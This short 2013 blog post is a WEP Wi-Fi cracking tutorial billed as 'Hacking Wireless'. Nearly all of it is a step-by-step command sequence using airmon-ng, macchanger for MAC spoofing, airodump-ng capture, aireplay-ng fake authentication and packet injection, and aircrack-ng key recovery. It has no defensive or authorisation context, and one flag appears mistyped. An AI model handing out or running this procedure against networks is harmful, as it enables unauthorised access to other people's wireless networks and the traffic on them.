==== Warmly welcome to | Knowledge Seeker Tutorials Zone | ====

Search This Blog

Friday, March 22, 2013

WiFi Penetration Tutorial [WEP]

Hacking Wireless (WEP)

WEP is crackable eazy and fast. No wordlist needed !

TERMINAL No.1


airmon-ng





airmon-ng start [interface]




ifconfig [interface] down
macchanger -m 00:11:22:33:44:55 [interface]
ifconfig [mon0] down
macchanger -m 00:11:22:33:44:55 [mon0]
ifconfig [interface] up
ifconfig [mon0] up





airodump-ng [mon0]




airodump-ng --bssid [BSSID] -c [CH] -w [file] [mon0]









TERMINAL No.2


aireplay-ng -fakeauth 0 -a [BSSID] [mon0]




aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b [BSSID] mon0




Yes








--wait for 30 000 #Data--





TERMINAL No.3


aircrack-ng [file]-01.cap








To stop terminal press »CTRL + C«

0 comments:

Post a Comment